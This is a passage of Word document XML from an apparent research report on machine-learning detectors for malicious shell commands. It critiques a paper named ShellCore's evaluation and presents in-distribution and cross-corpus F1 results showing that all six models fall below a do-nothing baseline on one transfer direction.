        <w:t xml:space="preserve">it runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>in ShellCore's favour</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore's actual thesis is not "we got 99.87." It is that the **character-level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representation is the one that carries the signal**, evidenced by their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>malware-only ablation, where term-level file classification collapses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>99.08 → 67.48 (RF) and 97.16 → 66.67 (DNN) while the character-level columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>lose a tenth of a point (99.91 → 99.79, 99.28 → 99.26). We reproduce that claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>independently, on two corpora they never saw, under a grouped split they never</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>used: **our character n-gram baseline outperforms all five engineered-feature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>models on both datasets** (D1 0.8975 vs the hybrid's 0.8761 and RF's 0.7963;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>D2 0.8824 vs 0.8482 and 0.7531). Forty-three hand-designed, threat-mapped,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>individually-justified features do not beat an untuned bag of 44,781 character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>n-grams fitted by a linear model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The correct conclusion is therefore split, and Chapter 8 should not blur it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>We reject ShellCore's evaluation protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ungrouped folds over</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>near-duplicate strings, a benign class that is 99.65% HTTP traffic with a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>standard deviation of 4.88 characters, and accuracy-first reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_3</w:t>
      </w:r>
      <w:r>
        <w:t>, arguments 1–4). Those choices are why 0.9978 is not a number a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>defender would experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>We confirm ShellCore's representational finding</w:t>
      </w:r>
      <w:r>
        <w:t>, on our own data, with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>our own protocol. It is the part of the paper that transfers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Our engineered features earn their place on interpretability and threat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>traceability — Chapter 1.3 maps each of the 43 to a technique, which no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>n-gram vector can do — and not on raw discriminative power. Stating that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>plainly is more useful than the alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The four confounds, applied to these two models</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> establishes them; their specific bite on RF and IF is worth one pass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore's benign class is unencrypted network traffic, so its decision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>boundary separates malware strings from HTTP payloads — a different and easier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">problem than separating an attacker's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from an administrator's, which is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the boundary Chapter 8.1 shows both our models actually fail on. That failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mode is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>unavailable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to ShellCore's setup: with a benign class of median</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>length 185 and standard deviation 4.88, no benign row can be confused with a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>384-character malware string. Chapter 8.1's central result — that 100% of RF's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>207 Dataset-1 misses sit at the benign end of every high-signal feature, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that none of them contains a shell binary — is a measurement that ShellCore's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus construction makes impossible to obtain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The Isolation Forest sharpens the point. ShellCore has no unsupervised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>comparator, and structurally cannot: its malicious class is defined by 1,273</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>regex patterns applied to disassembled binaries, so the method presupposes a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>labelled malicious corpus. Our Isolation Forest is the measurement of what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>remains when that presupposition is dropped — one detector in this project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that could be deployed on a network where no attack has yet been labelled. Its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>answer, AUC 0.81 in-distribution, is modest, and it is the only number here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that speaks to the cold-start case at all. Interestingly, it is also the only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">model in the project that transfers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>better</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the harder direction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(D2→D1 F1 0.2407 vs D1→D2 0.1481), because a notion of "normal" fitted to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>operational traffic is less corpus-specific than a fitted decision boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The number neither paper reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore reports no cross-corpus result, so nothing in it predicts what its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.9978 becomes on a corpus it was not trained on. We measured ours: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model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>in-distribution (D1 / D2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1→D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2→D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Random Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963 / 0.7531</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5148</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolation Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2492 / 0.1431</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1481</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2407</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>baseline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (char n-gram)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8975 / 0.8824</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5844</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2740</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The baseline's two transfer figures are measured over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> row of the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">corpus rather than its held-out split, which is how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>evaluate_baseline.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reports them; the model never saw either set, so the comparison is fair, but</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the row counts differ from the model rows above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Our Random Forest falls to 0.1432 on the punishing direction. The character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representation — the one that survived every other test in this chapter —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reaches only 0.2740, worse than three of the engineered-feature models. Both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are below the do-nothing floor, and they are not exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**On D2→D1 transfer, every one of the six models in this project scores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">below the do-nothing floor of 0.400** — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cnn1d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.3587, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xgboost_hybrid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>0.2756, baseline 0.2740, Isolation Forest 0.2407, XGBoost 0.2349, Random</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Forest 0.1432. On a corpus none of them was fitted to, a rule that flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>every command beats all of them on F1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That is the most important sentence in this chapter, and it is deliberately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>placed against ShellCore's 0.9978 rather than tucked into a limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>paragraph. It is the only figure in the comparison that was *measured rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than assumed*, and it is what a defender deploying any of these systems on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>unfamiliar traffic would actually experience. ShellCore reports no counterpart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>to it — not a worse number, no number — and until it does, the two results are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not describing the same kind of claim. A single-corpus 0.9978 and a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cross-corpus 0.1432 are answers to different questions, and only the second</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>one is the question operational deployment asks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.4 — The hybrid behavioural cascade: does the architecture earn its complexity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_4_cascade_findings.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> is generated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_4_cascade.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">and reports what the cascade </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>. This chapter reports what each stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, using the per-stage audit in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_4_cascade_forensics.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
